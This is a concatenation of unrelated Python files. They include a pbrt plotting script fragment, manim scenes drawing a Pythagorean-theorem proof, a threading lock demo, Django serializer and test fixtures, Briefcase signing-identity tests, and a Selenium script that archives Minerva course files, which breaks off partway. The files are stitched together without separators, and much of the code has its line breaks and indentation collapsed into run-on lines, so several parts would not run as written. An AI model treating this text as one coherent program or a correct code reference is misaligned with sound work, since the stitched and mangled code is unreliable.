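                  + max(io_time, compute_time))                           # 4 + 1 + 5.12 = 10.12 s
    return total_time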
plt.title('Render / $') plt.ylabel('Render time (seconds)') plt.xlabel('Dollars ($)') plt.legend() plt.show() plt.savefig('model.png') plt.clf() def main(): parser = argparse.ArgumentParser(description=( 'Generate a trace file for viewing in chrome://tracing from cloud pbrt worker intervals.')) parser.add_argument('--diagnostics-directory', default='diag', help=( 'Path to the master_stats.txt generated by ' 'pbrt-lambda-master after finished a run.')) parser.add_argument('--trace-path', default='pbrt.tar.gz', help='Path to write the compressed trace file to.') parser.add_argument('--graph-path', default='graphs/', help='Directory to write the generated graphs to.') args = parser.parse_args() #compare_model() print('Reading diagnostics from {:s}...'.format(args.diagnostics_directory), end='') diagnostics = Stats(args.diagnostics_directory) print() diagnostics.write_csv('test.csv') print('Done reading diagnostics.') if False: path = write_trace(stats, args.trace_path) print('Wrote trace to {:s}.'.format(path)) if True: path = args.graph_path plot_metrics(diagnostics, path) print('Wrote graphs to {:s}.'.format(path)) if __name__ == "__main__": main() 0 import numpy as np import itertools as it from copy import deepcopy import sys from constants import * from scene.scene import Scene from geometry import Polygon from mobject.region import region_from_polygon_vertices, region_from_line_boundary A_COLOR = BLUE B_COLOR = MAROON_D C_COLOR = YELLOW TEX_MOB_SCALE_FACTOR = 0.5 POINTS = np.array([ DOWN, 2*UP, DOWN+RIGHT, 2*DOWN, 2*DOWN+RIGHT, DOWN+3*LEFT, 2*UP+3*LEFT, 4*RIGHT, 3*UP+3*RIGHT, ]) class Triangle(Polygon): def __init__(self, **kwargs): kwargs["color"] = C_COLOR Polygon.__init__( self, *POINTS[[0, 1, 2]], edge_colors=[B_COLOR, C_COLOR, A_COLOR], **kwargs ) nudge = 0.2 target = POINTS[0]+nudge*(UP+RIGHT) for direction in UP, RIGHT: self.add_line(POINTS[0]+nudge*direction, target, color=WHITE) def add_all_letters(self): for char in "abc": self.add_letter(char) return self def add_letter(self, char, nudge=0.3): mob = TexMobject(char).scale(TEX_MOB_SCALE_FACTOR) if char == "a": points = self.get_vertices()[[0, 2, 1]] elif char == "b": points = self.get_vertices()[[1, 0, 2]] elif char == "c": points = self.get_vertices()[[2, 1, 0]] center = 0.5*sum(points[:2]) # average of first two points mob.shift(center) normal_dir = rotate_vector(points[1] - points[0], np.pi/2, OUT) if np.dot(normal_dir, points[2]-center) > 0: normal_dir = -normal_dir normal_dir /= get_norm(normal_dir) mob.shift(nudge*normal_dir) self.add(mob) return self def place_hypotenuse_on(self, point1, point2): #self.vertices[1], self.vertices[2] start1, start2 = self.get_vertices()[[1, 2]] target_vect = np.array(point2)-np.array(point1) curr_vect = start2-start1 self.scale(get_norm(target_vect)/get_norm(curr_vect)) self.rotate(angle_of_vector(target_vect)-angle_of_vector(curr_vect)) self.shift(point1-self.get_vertices()[1]) return self def a_square(**kwargs): return Polygon(*POINTS[[0, 2, 4, 3]], color=A_COLOR, **kwargs) def b_square(**kwargs): return Polygon(*POINTS[[1, 0, 5, 6]], color=B_COLOR, **kwargs) def c_square(**kwargs): return Polygon(*POINTS[[1, 2, 7, 8]], color=C_COLOR, **kwargs) class DrawPointsReference(Scene): def construct(self): for point, count in zip(POINTS, it.count()): mob = TexMobject(str(count)).scale(TEX_MOB_SCALE_FACTOR) mob.shift(POINTS[count]) self.add(mob) class DrawTriangle(Scene): def construct(self): self.add(Triangle().add_all_letters()) class DrawAllThreeSquares(Scene): def construct(self): a = 
a_square() b = b_square() c = c_square() self.add(Triangle(), a, b, c) for letter, mob in zip("abc", [a, b, c]): char_mob = TexMobject(letter+"^2").scale(TEX_MOB_SCALE_FACTOR) char_mob.shift(mob.get_center()) self.add(char_mob) class AddParallelLines(DrawAllThreeSquares): args_list = [ (1, False), (2, False), (3, False), (3, True), ] @staticmethod def args_to_string(num, trim): return str(num) + ("Trimmed" if trim else "") def construct(self, num, trim): DrawAllThreeSquares.construct(self) shift_pairs = [ (4*RIGHT, 3*UP), (ORIGIN, DOWN), (3*LEFT, 2*DOWN) ] for side_shift, vert_shift in shift_pairs[:num]: line1 = Line(BOTTOM, TOP, color=WHITE) line1.shift(side_shift) line2 = Line(LEFT_SIDE, RIGHT_SIDE, color=WHITE) line2.shift(vert_shift) self.add(line1, line2) if trim: for mob in self.mobjects: mob.filter_out(lambda p: p[0] > 4) mob.filter_out(lambda p: p[0] < -3) mob.filter_out(lambda p: p[1] > 3) mob.filter_out(lambda p: p[1] < -2) class HighlightEmergentTriangles(AddParallelLines): args_list = [(3, True)] def construct(self, *args): AddParallelLines.construct(self, *args) triplets = [ [(0, 2), (0, -1), (1, -1)], [(1, -1), (4, -1), (4, 0)], [(4, 0), (4, 3), (3, 3)], [(3, 3), (0, 3), (0, 2)], ] for triplet in triplets: self.set_color_region( region_from_polygon_vertices(*triplet), color="DARK_BLUE" ) class IndicateTroublePointFromParallelLines(AddParallelLines): args_list = [(3, True)] def construct(self, *args): AddParallelLines.construct(self, *args) circle = Circle(radius=0.25) circle.shift(DOWN+RIGHT) vect = DOWN+RIGHT arrow = Arrow(circle.get_center()+2*vect, circle.get_boundary_point(vect)) arrow.set_color(circle.get_color()) self.add_mobjects_among(list(locals().values())) class DrawAllThreeSquaresWithMoreTriangles(DrawAllThreeSquares): args_list = [ (1, True), (2, True), (3, True), (4, True), (5, True), (6, True), (7, True), (8, True), (9, True), (10, True), (10, False) ] @staticmethod def args_to_string(num, fill): fill_string = "" if fill else "HollowTriangles" return str(num) + fill_string def construct(self, num, fill): DrawAllThreeSquares.construct(self) pairs = [ ((0, 2, 0), (1, -1, 0)), ((-3, -1, 0), (0, -2, 0)), ((4, -1, 0), (1, -2, 0)), ((0, -2, 0), (-3, -1, 0)), ((1, -2, 0), (4, -1, 0)), ((1, -1, 0), (4, 0, 0)), ((4, 0, 0), (3, 3, 0)), ((3, 3, 0), (0, 2, 0)), ((-3, 3, 0), (0, 2, 0)), ((0, 2, 0), (-3, 3, 0)) ] to_flip = [1, 3, 8, 9] for n in range(num): triangle = Triangle() if n in to_flip: triangle.rotate(np.pi, UP) self.add(triangle.place_hypotenuse_on(*pairs[n])) vertices = list(triangle.get_vertices()) if n not in to_flip: vertices.reverse() if fill: self.set_color_region( region_from_polygon_vertices(*vertices), color=DARK_BLUE ) class IndicateBigRectangleTroublePoint(DrawAllThreeSquaresWithMoreTriangles): args_list = [(10, False)] def construct(self, *args): DrawAllThreeSquaresWithMoreTriangles.construct(self, *args) circle = Circle(radius=0.25, color=WHITE) circle.shift(4*RIGHT) vect = DOWN+RIGHT arrow = Arrow(circle.get_center()+vect, circle.get_boundary_point(vect)) self.add_mobjects_among(list(locals().values())) class ShowBigRectangleDimensions(DrawAllThreeSquaresWithMoreTriangles): args_list = [(10, False)] def construct(self, num, fill): DrawAllThreeSquaresWithMoreTriangles.construct(self, num, fill) u_brace = Underbrace((-3, -2, 0), (4, -2, 0)) side_brace = Underbrace((-3, -3, 0), (2, -3, 0)) for brace in u_brace, side_brace: brace.shift(0.2*DOWN) side_brace.rotate(-np.pi/2) a_plus_2b = TexMobject("a+2b").scale(TEX_MOB_SCALE_FACTOR) b_plus_2a = 
TexMobject("b+2a").scale(TEX_MOB_SCALE_FACTOR) a_plus_2b.next_to(u_brace, DOWN) b_plus_2a.next_to(side_brace, LEFT) self.add_mobjects_among(list(locals().values())) class FillInAreaOfBigRectangle(DrawAllThreeSquaresWithMoreTriangles): args_list = [(10, False)] def construct(self, *args): DrawAllThreeSquaresWithMoreTriangles.construct(self, *args) args_list = [(10, False)] color = Color("yellow") color.set_rgb(0.3*np.array(color.get_rgb())) self.set_color_region( region_from_polygon_vertices( (-3, 3), (-3, -2), (4, -2), (4, 3) ), color=color ) class DrawOnlyABSquares(Scene): def construct(self): a = a_square() b = b_square() for char, mob in zip("ab", [a, b]): symobl = TexMobject(char+"^2").scale(TEX_MOB_SCALE_FACTOR) symobl.shift(mob.get_center()) self.add(symobl) triangle = Triangle() self.add_mobjects_among(list(locals().values())) class AddTriangleCopyToABSquares(DrawOnlyABSquares): def construct(self): DrawOnlyABSquares.construct(self) triangle = Triangle() triangle.rotate(np.pi, UP) triangle.place_hypotenuse_on(3*LEFT+DOWN, 2*DOWN) self.add(triangle) self.set_color_triangles() def set_color_triangles(self): for mob in self.mobjects: if isinstance(mob, Triangle): vertices = list(mob.get_vertices()) for x in range(2): self.set_color_region(region_from_polygon_vertices( *vertices ), color=DARK_BLUE) vertices.reverse() # silly hack class AddAllTrianglesToABSquares(AddTriangleCopyToABSquares): def construct(self): AddTriangleCopyToABSquares.construct(self) self.add(Triangle().place_hypotenuse_on(RIGHT+DOWN, 2*UP)) triangle = Triangle() triangle.rotate(np.pi, UP) triangle.place_hypotenuse_on(2*DOWN, 3*LEFT+DOWN) self.add(triangle) self.set_color_triangles() class DrawNakedCSqurae(Scene): def construct(self): c = c_square().center() triangle = Triangle().place_hypotenuse_on(*c.get_vertices()[[0, 1]]) triangle.add_all_letters() self.add(triangle, c) class DrawCSquareWithAllTraingles(Scene): args_list = [ (False, False, False, False), (False, True, False, True), (True, True, False, False), (False, True, True, False), ] @staticmethod def args_to_string(*toggle_vector): return "".join(map(str, list(map(int, toggle_vector)))) def construct(self, *toggle_vector): if len(toggle_vector) == 0: toggle_vector = [False]*4 self.c_square = c_square().center() vertices = it.cycle(self.c_square.get_vertices()) last_vertex = next(vertices) have_letters = False self.triangles = [] for vertex, should_flip in zip(vertices, toggle_vector): triangle = Triangle() pair = np.array([last_vertex, vertex]) if should_flip: triangle.rotate(np.pi, UP) pair = pair[[1, 0]] triangle.place_hypotenuse_on(*pair) if not have_letters: triangle.add_all_letters() have_letters = True self.triangles.append(triangle) self.add(triangle) last_vertex = vertex self.add(self.c_square) class HighlightCSquareInBigSquare(DrawCSquareWithAllTraingles): args_list = [tuple([False]*4)] def construct(self, *args): DrawCSquareWithAllTraingles.construct(self, *args) self.set_color_region(region_from_polygon_vertices( *c_square().center().get_vertices() ), color=YELLOW) class IndicateCSquareTroublePoint(DrawCSquareWithAllTraingles): def construct(self, *toggle_vector): DrawCSquareWithAllTraingles.construct(self, *toggle_vector) circle = Circle(color=WHITE) circle.scale(0.25) vertex = self.c_square.get_vertices()[1] circle.shift(vertex) vect = 2*RIGHT+DOWN arrow = Arrow(vertex+vect, circle.get_boundary_point(vect)) self.add(circle, arrow) class ZoomInOnTroublePoint(Scene): args_list = list(it.product([True, False], [True, False])) @staticmethod def 
args_to_string(with_labels, rotate): label_string = "WithLabels" if with_labels else "WithoutLabels" rotate_string = "Rotated" if rotate else "" return label_string + rotate_string def construct(self, with_labels, rotate): zoom_factor = 10 density = zoom_factor*DEFAULT_POINT_DENSITY_1D c = c_square(density=density) c.shift(-c.get_vertices()[1]) c.scale(zoom_factor) vertices = c.get_vertices() for index in 0, 1: triangle = Triangle(density=density) triangle.place_hypotenuse_on(vertices[index], vertices[index+1]) self.add(triangle) circle = Circle(radius=2.5, color=WHITE) angle1_arc = Circle(color=WHITE) angle2_arc = Circle(color=WHITE).scale(0.5) angle1_arc.filter_out(lambda x_y_z2: not ( x_y_z2[0] > 0 and x_y_z2[1] > 0 and x_y_z2[1] < x_y_z2[0]/3)) angle2_arc.filter_out(lambda x_y_z3: not ( x_y_z3[0] < 0 and x_y_z3[1] > 0 and x_y_z3[1] < -3*x_y_z3[0])) self.add_mobjects_among(list(locals().values())) self.add_elbow() if rotate: for mob in self.mobjects: mob.rotate(np.pi/2) if with_labels: alpha = TexMobject("\\alpha").scale(TEX_MOB_SCALE_FACTOR) beta = TexMobject("90-\\alpha").scale(TEX_MOB_SCALE_FACTOR) if rotate: alpha.next_to(angle1_arc, UP+0.1*LEFT) beta.next_to(angle2_arc, DOWN+0.5*LEFT) else: alpha.next_to(angle1_arc, RIGHT) beta.next_to(angle2_arc, LEFT) self.add(alpha, beta) def add_elbow(self): c = 0.1 p1 = c*LEFT + 3*c*UP p2 = 3*c*RIGHT + c*UP p3 = 2*c*RIGHT + 4*c*UP self.add(Line(p1, p3, color=WHITE)) self.add(Line(p2, p3, color=WHITE)) class DrawTriangleWithAngles(Scene): def construct(self): triangle = Triangle(density=2*DEFAULT_POINT_DENSITY_1D) triangle.scale(2).center().add_all_letters() vertices = triangle.get_vertices() kwargs = {"color": WHITE} angle1_arc = Circle(radius=0.4, **kwargs).filter_out( lambda x_y_z: not(x_y_z[0] > 0 and x_y_z[1] < 0 and x_y_z[1] < -3*x_y_z[0]) ).shift(vertices[1]) angle2_arc = Circle(radius=0.2, **kwargs).filter_out( lambda x_y_z1: not( x_y_z1[0] < 0 and x_y_z1[1] > 0 and x_y_z1[1] < -3*x_y_z1[0]) ).shift(vertices[2]) alpha = TexMobject("\\alpha") beta = TexMobject("90-\\alpha") alpha.shift(vertices[1]+3*RIGHT+DOWN) beta.shift(vertices[2]+3*RIGHT+UP) arrow1 = Arrow(alpha, angle1_arc) arrow2 = Arrow(beta, angle2_arc) self.add(triangle, angle1_arc, angle2_arc, alpha, beta, arrow1, arrow2) class LabelLargeSquare(DrawCSquareWithAllTraingles): args_list = [] def construct(self): DrawCSquareWithAllTraingles.construct(self) everything = Mobject(*self.mobjects) u_brace = Underbrace(2*(DOWN+LEFT), 2*(DOWN+RIGHT)) u_brace.shift(0.2*DOWN) side_brace = deepcopy(u_brace).rotate(np.pi/2) upper_brace = deepcopy(u_brace).rotate(np.pi) a_plus_b = TexMobject("a+b").scale(TEX_MOB_SCALE_FACTOR) upper_brace.add(a_plus_b.next_to(upper_brace, UP)) side_brace.add(a_plus_b.next_to(side_brace, RIGHT)) self.add(upper_brace, side_brace) class CompletelyFillLargeSquare(LabelLargeSquare): def construct(self): LabelLargeSquare.construct(self) vertices = [2*(DOWN+LEFT), 2*(DOWN+RIGHT), 2*(UP+RIGHT), 2*(UP+LEFT)] vertices.append(vertices[0]) pairs = list(zip(vertices, vertices[1:])) self.set_color_region(region_from_line_boundary(*pairs), color=BLUE) class FillComponentsOfLargeSquare(LabelLargeSquare): def construct(self): LabelLargeSquare.construct(self) points = np.array([ 2*UP+2*LEFT, UP+2*LEFT, 2*DOWN+2*LEFT, 2*DOWN+LEFT, 2*DOWN+2*RIGHT, DOWN+2*RIGHT, 2*UP+2*RIGHT, RIGHT+2*UP ]) for triplet in [[0, 1, 7], [2, 3, 1], [4, 5, 3], [6, 7, 5]]: triplet.append(triplet[0]) self.set_color_region(region_from_line_boundary(*[ [points[i], points[j]] for i, j in zip(triplet, 
triplet[1:]) ]), color=DARK_BLUE)
        vertices = points[[1, 3, 5, 7, 1]]
        self.set_color_region(region_from_line_boundary(*[
            [p1, p2] for p1, p2 in zip(vertices, vertices[1:])
        ]), color=YELLOW)


class ShowRearrangementInBigSquare(DrawCSquareWithAllTraingles):
    args_list = []

    def construct(self):
        self.add(Square(side_length=4, color=WHITE))
        DrawCSquareWithAllTraingles.construct(self)
        self.remove(self.c_square)
        self.triangles[1].shift(LEFT)
        for i, j in [(0, 2), (3, 1)]:
            self.triangles[i].place_hypotenuse_on(
                *self.triangles[j].get_vertices()[[2, 1]]
            )


class ShowRearrangementInBigSquareWithRegions(ShowRearrangementInBigSquare):
    def construct(self):
        ShowRearrangementInBigSquare.construct(self)
        self.set_color_region(region_from_polygon_vertices(
            2*(LEFT+UP), 2*LEFT+DOWN, RIGHT+DOWN, RIGHT+2*UP
        ), color=B_COLOR)
        self.set_color_region(region_from_polygon_vertices(
            RIGHT+DOWN, RIGHT+2*DOWN, 2*RIGHT+2*DOWN, 2*RIGHT+DOWN
        ), color=A_COLOR)
# encoding: UTF-8
'''
Created on 2015-03-06

@author: wanhao01
'''
import threading
import time

data = 0
lock = threading.Lock()


def func():
    global data
    print '%s acquire lock...' % threading.currentThread().getName()
    # Calling acquire([timeout]) blocks the thread until the lock is acquired,
    # or until `timeout` seconds have elapsed (the timeout argument is
    # optional). It returns whether the lock was acquired.
    if lock.acquire():
        print '%s get the lock.' % threading.currentThread().getName()
        data += 1
        time.sleep(2)
        print '%s release lock...' % threading.currentThread().getName()
        # Calling release() releases the lock.
        lock.release()

t1 = threading.Thread(target=func)
t2 = threading.Thread(target=func)
t3 = threading.Thread(target=func)
t1.start()
t2.start()
t3.start()
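# Added for comparison with the Python 2 example above: the same locking
# pattern in Python 3, using the Lock as a context manager so release()
# cannot be skipped if an exception is raised.
import threading
import time


def _locked_increment(counter, lock):
    with lock:            # acquire() on entry, release() on exit
        counter['value'] += 1
        time.sleep(0.1)


def _run_locked_increment_demo():
    counter = {'value': 0}
    lock = threading.Lock()
    threads = [threading.Thread(target=_locked_increment, args=(counter, lock))
               for _ in range(3)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return counter['value']   # 3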
orchestra/contrib/contacts/serializers.py
from rest_framework import serializers
#from orchestra.api.serializers import MultiSelectField
from orchestra.contrib.accounts.serializers import AccountSerializerMixin

from .models import Contact


class ContactSerializer(AccountSerializerMixin, serializers.HyperlinkedModelSerializer):
    email_usage = serializers.MultipleChoiceField(choices=Contact.EMAIL_USAGES)

    class Meta:
        model = Contact
        fields = (
            'url', 'id', 'short_name', 'full_name', 'email', 'email_usage',
            'phone', 'phone2', 'address', 'city', 'zipcode', 'country'
        )
from django.contrib.auth.models import Group

from api.tests.data.product_ranges import TestProductRanges
from api.tests.utils.test_objects import TestObjects


class TestGroups(TestObjects):
    MODEL = Group

    # These models are created in the initial Django signal, not from this data.
    # These are just for easy handling.
    ADMIN: MODEL
    ORDER: MODEL
    COAT_CHECK: MODEL
    CHECK_IN: MODEL
    TRANSFER: MODEL
    SCAN: MODEL
    PRODUCT_RANGE_ALL: MODEL
    PRODUCT_RANGE_1: MODEL
    PRODUCT_RANGE_2: MODEL

    @classmethod
    def init(cls):
        cls.ADMIN = cls.MODEL(id=14010, name='admin')
        cls.ORDER = cls.MODEL(id=14020, name='order')
        cls.COAT_CHECK = cls.MODEL(id=14030, name='coat_check')
        cls.CHECK_IN = cls.MODEL(id=14040, name='check_in')
        cls.TRANSFER = cls.MODEL(id=14050, name='transfer')
        cls.SCAN = cls.MODEL(id=14060, name='scan')
        cls.PRODUCT_RANGE_ALL = cls.MODEL(id=14070, name='product_range_all')
        cls.PRODUCT_RANGE_1 = cls.MODEL(id=14080, name=f'product_range_{TestProductRanges.JUST_WATER.id}')
        cls.PRODUCT_RANGE_2 = cls.MODEL(id=14090, name=f'product_range_{TestProductRanges.EVERYTHING.id}')

        cls.SAVED = [
            cls.ADMIN, cls.ORDER, cls.COAT_CHECK, cls.CHECK_IN, cls.TRANSFER, cls.SCAN,
            cls.PRODUCT_RANGE_ALL, cls.PRODUCT_RANGE_1, cls.PRODUCT_RANGE_2
        ]

    @classmethod
    def create(cls):
        # Establish links between these groups and the ones already in the DB.
        for group in cls.SAVED:
            group: Group = group
            group.id = Group.objects.get(name=group.name).id
            # Link to DB so many-to-many relations can be set.
            group.refresh_from_db()
#!/usr/bin/python

from BoostBuild import Tester

t = Tester()

t.write("project-root.jam", "import gcc ;")
t.write("Jamfile", "lib a : a.cpp : . ;")
t.write("a.cpp", """
#include <a.h>
void foo() {}
""")
t.write("a.h", "")
t.write("d/Jamfile", "exe b : b.cpp ../a ; ")
t.write("d/b.cpp", """
void foo();
int main() { foo(); }
""")

t.run_build_system(subdir="d")
t.cleanup()
from unittest import mock

import pytest

from briefcase.exceptions import BriefcaseCommandError
from briefcase.platforms.macOS.app import macOSAppPackageCommand
from tests.utils import DummyConsole


class DummyPublishCommand(macOSAppPackageCommand):
    """
    A Publish command that overrides
    """
    def __init__(self, base_path, **kwargs):
        super().__init__(base_path=base_path, **kwargs)
        self.input = DummyConsole()


@pytest.fixture
def dummy_command(tmp_path):
    cmd = DummyPublishCommand(base_path=tmp_path)

    # Mock the options object
    cmd.options = mock.MagicMock()
    cmd.options.device = None

    # Mock get_identities
    mock_get_identities = mock.MagicMock()
    cmd.get_identities = mock_get_identities

    return cmd


def test_explicit_identity_checksum(dummy_command):
    "If the user nominates an identity by checksum, it is used."
    # get_identities will return some options.
    dummy_command.get_identities.return_value = {
        '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)",
        '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)",
    }

    # The identity will be the one the user specified as an option.
    result = dummy_command.select_identity('11E77FB58F13F6108B38110D5D92233C58ED38C5')

    assert result == "iPhone Developer: (BXAH5H869S)"

    # User input was not solicited
    assert dummy_command.input.prompts == []


def test_explicit_identity_name(dummy_command):
    "If the user nominates an identity by name, it is used."
    # get_identities will return some options.
    dummy_command.get_identities.return_value = {
        '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)",
        '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)",
    }

    # The identity will be the one the user specified as an option.
    result = dummy_command.select_identity("iPhone Developer: (BXAH5H869S)")

    assert result == "iPhone Developer: (BXAH5H869S)"

    # User input was not solicited
    assert dummy_command.input.prompts == []


def test_invalid_identity_name(dummy_command):
    "If the user nominates an identity that does not exist, an error is raised."
    # get_identities will return some options.
    dummy_command.get_identities.return_value = {
        '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)",
        '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)",
    }

    # The nominated identity doesn't match any known identity, so an error is raised.
    with pytest.raises(BriefcaseCommandError):
        dummy_command.select_identity("not-an-identity")

    # User input was not solicited
    assert dummy_command.input.prompts == []


def test_implied_identity(dummy_command):
    "If there is only one identity, it is automatically picked."
    # get_identities will return some options.
    dummy_command.get_identities.return_value = {
        '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)",
    }

    result = dummy_command.select_identity()

    # The identity will be the only option available.
assert result == "iPhone Developer: (BXAH5H869S)" # User input was not solicited assert dummy_command.input.prompts == [] def test_selected_identity(dummy_command): "If there is only one identity, it is automatically picked." # get_identities will return some options. dummy_command.get_identities.return_value = { '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)", '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)", } # Return option 2 dummy_command.input.values = ['2'] result = dummy_command.select_identity() # The identity will be the only option available. assert result == "iPhone Developer: (BXAH5H869S)" # User input was solicited once assert dummy_command.input.prompts == ['> '] bcoppens/MinervArchiver #!/usr/bin/env python3 import logging import os from pathlib import Path from selenium import webdriver from selenium.webdriver.chrome.webdriver import WebDriver from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support.ui import Select import sys # Set-up the logger. logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', datefmt='%d/%m/%Y %H:%M:%S', level=logging.INFO) def ask_user(question: str) -> str: resp = None while not resp: resp = input(question) return resp def login(driver: WebDriver, username: str, password: str): # Load Minerva home. driver.get('https://minerva.ugent.be/') # Click the login button. login_btn = driver.find_element_by_id('btn_logincas') login_btn.click() sleep = WebDriverWait(driver, 10) sleep.until(lambda d: 'login.ugent.be' in d.current_url) # Fill in username. username_field = driver.find_element_by_id('username') username_field.send_keys(username) # Fill in password. password_field = driver.find_element_by_id('user_pass') password_field.send_keys(password) # Click authenticate button. login_auth_btn = driver.find_element_by_id('wp-submit') login_auth_btn.click() sleep = WebDriverWait(driver, 10) sleep.until(lambda d: 'minerva.ugent.be' in d.current_url) def get_courses(driver: WebDriver) -> set: driver.get("https://minerva.ugent.be/index.php") sleep = WebDriverWait(driver, 10) sleep.until(lambda d: 'index.php' in d.current_url) # Get the courses. courses = set() links = driver.find_elements_by_tag_name('a') for link in links: href = link.get_attribute('href') if href is not None and 'course_home.php?cidReq=' in href: courses.add(link.get_attribute('href')) return courses def get_clean_course_name(course: str, course_name: str): course_name_clean = "".join(c for c in course_name if c.isalpha() or c.isdigit() or c == ' ').rstrip() return f"{course[course.index('cidReq') + 7:]} - {course_name_clean.lower()}" def get_base_directory(course: str, course_name: str): return os.path.join(out_dir, get_clean_course_name(course, course_name)) def download_documents(driver: WebDriver, course: str): # Browse to the home directory. driver.get(course) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: course in d.current_url) files = course.replace("course_home", "document") driver.get(files) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: files in d.current_url) # Click the zip link. links = driver.find_elements_by_tag_name('a') ziplink = None for link in links: href = link.get_attribute('href') if href is not None and 'downloadfolder' in href: ziplink = href break if not ziplink: logging.error("ZIP-link not found :(") exit(1) # Determine the course name. 
course_name = None for c in driver.find_elements_by_tag_name('h1'): if 'minerva' not in str(c.text).lower(): course_name = c.text # Find the file name. new_name = f"{get_clean_course_name(course, course_name)}.zip" new_path = os.path.join(get_base_directory(course, course_name), "documents") Path(new_path).mkdir(parents=True, exist_ok=True) new_file = os.path.join(new_path, new_name) if os.path.exists(new_file): logging.info(f"Already exists {new_name}") return empties = driver.find_elements_by_class_name('italic') for empty in empties: if empty.tag_name == 'td' and 'Geen gegevens weer te geven' in empty.text: logging.info(f"No files found: {new_name}") return driver.get(ziplink) # Wait for the file to download. logging.info("Awaiting file download...") out_file = os.path.join(out_dir, 'documents.zip') sleep = WebDriverWait(driver, 1800) sleep.until(lambda d: os.path.exists(out_file)) # Rename the file. os.rename(out_file, new_file) logging.info(f"Saved {new_name}") # From https://selenium-python.readthedocs.io/waits.html class element_has_css_class(object): """An expectation for checking that an element has a particular css class. locator - used to find the element returns the WebElement once it has the particular css class """ def __init__(self, locator, css_class): self.locator = locator self.css_class = css_class def __call__(self, driver): element = driver.find_element(*self.locator) # Finding the referenced element if self.css_class in element.get_attribute("class"): return element else: return False def download_student_publications(driver: WebDriver, course: str): # Browse to the home directory. driver.get(course) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: course in d.current_url) links = driver.find_elements_by_tag_name('a') present = False for link in links: href = link.get_attribute('href') if href is not None and 'student_publication' in href: color = link.value_of_css_property("color") print (color) if "rgba(30, 100, 200, 1)" in str(color): present = True break if not present: return logging.info("Found student publications") files = course.replace("course_home/course_home.php", "student_publication/index.php") driver.get(files) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: files in d.current_url) # Click the zip link. 
links = driver.find_elements_by_tag_name('input') id_link = None for link in links: id = link.get_attribute('id') print (id) if id is not None and "select_all_none_actions_top" in id: id_link = link break if not id_link: logging.error("id-link not found :(") exit(1) id_link.click() #sleep = WebDriverWait(driver, 10) #element = sleep.until(element_has_css_class((By.ID, 'select_all_none_actions'), "multiple_actions_checkbox_checked")) selects = driver.find_elements_by_tag_name('select') dropdown = None for select in selects: name = select.get_attribute('name') if name is not None and "multiple_actions" in name: dropdown = select break if not dropdown: logging.error("dropdown not found, probably a visible student publications without submissions!") return Select(dropdown).select_by_visible_text("Download") inputs = driver.find_elements_by_tag_name('input') submit = None for input in inputs: id = input.get_attribute('id') if id is not None and "multiple_actions_submit" in id: submit = input break if not submit: logging.error("submit not found :(") exit(1) submit.click() driver.switch_to_alert().accept() # These files appear in out_dir/ under the name --studentpublications.zip # Given that I can't easily redirect these files in Selenium(?), just leave it def download_dropbox(driver: WebDriver, course: str): # Browse to the home directory. driver.get(course) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: course in d.current_url) links = driver.find_elements_by_tag_name('a') present = False for link in links: href = link.get_attribute('href') if href is not None and 'dropbox' in href: color = link.value_of_css_property("color") print (color) if "rgba(30, 100, 200, 1)" in str(color): present = True break if not present: return logging.info("Found dropbox") files = course.replace("course_home/course_home.php", "dropbox/index.php") driver.get(files) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: files in d.current_url) # Click the zip link. links = driver.find_elements_by_tag_name('input') id_link = None for link in links: id = link.get_attribute('id') print (id) if id is not None and "select_all_none_actions_top" in id: id_link = link break if not id_link: logging.error("id-link not found :(") exit(1) id_link.click() #sleep = WebDriverWait(driver, 10) #element = sleep.until(element_has_css_class((By.ID, 'select_all_none_actions'), "multiple_actions_checkbox_checked")) selects = driver.find_elements_by_tag_name('select') dropdown = None for select in selects: name = select.get_attribute('name') if name is not None and "multiple_actions" in name: dropdown = select break if not dropdown: logging.error("dropdown not found, probably a visible dropbox without submissions!") return Select(dropdown).select_by_visible_text("Bestand/folder downloaden") inputs = driver.find_elements_by_tag_name('input') submit = None for input in inputs: id = input.get_attribute('id') if id is not None and "multiple_actions_submit" in id: submit = input break if not submit: logging.error("submit not found :(") exit(1) submit.click() driver.switch_to_alert().accept() # These files appear in out_dir/ but don't have a uniform name. If there is only one file, this takes the filename # of that file, if there are multiple, they are sent to a zip file. # Given that I can't easily redirect these files in Selenium(?), just leave it if __name__ == '__main__': # Validate arguments. if len(sys.argv) != 2: logging.error("Syntax: python3 main.py output_directory") exit(1) # Parse arguments. 
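# Added note (sketch): the locator and alert helpers used throughout this
# script (find_element_by_id, find_elements_by_tag_name, switch_to_alert)
# were deprecated and later removed in Selenium 4. If this script is run
# against a recent Selenium, the equivalent calls are:
#
#   from selenium.webdriver.common.by import By
#   driver.find_element(By.ID, 'username')
#   driver.find_elements(By.TAG_NAME, 'a')
#   driver.switch_to.alert.accept()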
